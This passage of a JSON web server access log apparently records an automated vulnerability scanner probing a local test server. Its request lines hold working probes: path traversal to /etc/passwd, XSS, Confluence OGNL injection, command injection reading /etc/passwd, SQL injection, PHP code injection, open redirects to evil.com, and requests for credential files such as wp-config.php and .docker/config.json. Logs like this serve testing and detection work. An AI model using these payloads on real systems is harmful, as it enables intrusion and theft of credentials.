+0000","request_body":"errorpage=/etc/passwd&obj-action=auth&:action=login","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/webproc HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_gadgetfactory&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /messages HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.docker/config.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/cab-fare-calculator/tblight.php?controller=../../../../../../../../../../../etc/passwd%00&action=1&ajax=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ckeditor/samples/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/apcupsd/multimon.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Portal/Portal.mwsl?PriNav=Bgz&filtername=Name&filtervalue=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&Send=Filter HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:53 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /confluence/pages/createpage-entervariables.action HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/vkeyboard/vkeyboard.php?passformname=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /v1/metadata HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /documentation HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /filter/jmol/js/jsmol/php/jsmol.php?call=saveFile&data=%3Cscript%3Ealert(%27XSS%27)%3C/script%3E&mimetype=text/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?action=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wp-hide-security-enhancer/router/file-process.php?action=style-clean&file_path=/wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cobbler/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Thumbs.db HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:53 +0000","request_body":"form_id=user_login&name={{username}}&pass={{password}}&op=Log+in","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /?q=user%2Flogin HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /deltaweb/hmi_login.asp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /images/icons_title.gif HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /editor/ckeditor/samples/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/multimon.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:53 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wiki/pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:53 +0000","request_body":"grant_type=authorization_code&client_id=xxx&redirect_uri=https%3A%2F%2Fprojectdiscovery.io&code=xxx&client_secret=xxx","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /oauth/token HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /administrator/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /version HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?redirect=/\x5C/evil.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/nextgen-gallery/nggallery.php?test-head=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /v1/tasks HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /documentation/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /linuxki/experimental/vis/kivis.php?type=kitrace&pid=0;echo%20START;cat%20/etc/passwd;echo%20END; HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /groovyconsole HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /lua/%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2ffind_prefs.lua.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mailsms/s?func=ADMIN:appState&dumpConfig=/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cblr/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"username=admin&password=admin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"DELETE /images/icons_title.gif HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"DELETE", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ckeditor/samples/sample_posteddata.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?wptouch_switch=desktop&redirect=https://example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wiki/pages/createpage-entervariables.action HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mail/src/compose.php?mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/users/search_authors HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?redirect=//evil.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /go/admin/pipelines/create?group=defaultGroup HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webGui/images/green-on.png/?path=x&site[x][text]=%3C?php%20phpinfo();%20?%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc/groovyconsole.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /lua/.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2ffind_prefs.lua.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /heapdump HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?locale=en HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /remotereporter/load_logfiles.php?server=127.0.0.1&url=https://example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /images/icons_title.gif HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20md5(202072102)))),@`%27` HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /editor/ckeditor/samples/sample_posteddata.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", 